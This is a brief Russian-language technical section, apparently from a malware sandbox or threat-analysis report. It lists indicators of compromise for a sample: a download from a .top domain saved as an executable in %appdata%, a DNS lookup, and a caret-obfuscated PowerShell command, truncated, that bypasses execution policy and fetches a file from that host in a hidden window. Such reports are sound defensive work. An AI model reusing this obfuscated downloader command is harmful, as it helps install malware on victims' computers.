Техническая информация
- http://cocalolo.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOw^ER^Sh^Ell.^E^X^E ^-^ex^E^cUt^ionpO^L^i^C^Y bypaSs -N^OPr^oFIL^E^ -wIn^dOwStYLE^ hID^Den (^New-o^BjeCT ^sYs^TeM.^NET.w^E^bc^li^EN^T^).dO^wNLo^ADf^il^E(^'http://cocalolo.t...
- DNS ASK co###olo.top
- '<SYSTEM32>\cmd.exe' /C "pOw^ER^Sh^Ell.^E^X^E ^-^ex^E^cUt^ionpO^L^i^C^Y bypaSs -N^OPr^oFIL^E^ -wIn^dOwStYLE^ hID^Den (^New-o^BjeCT ^sYs^TeM.^NET.w^E^bc^li^EN^T^).dO^wNLo^ADf^il^E(^'http://cocalolo.t...' (со скрытым окном)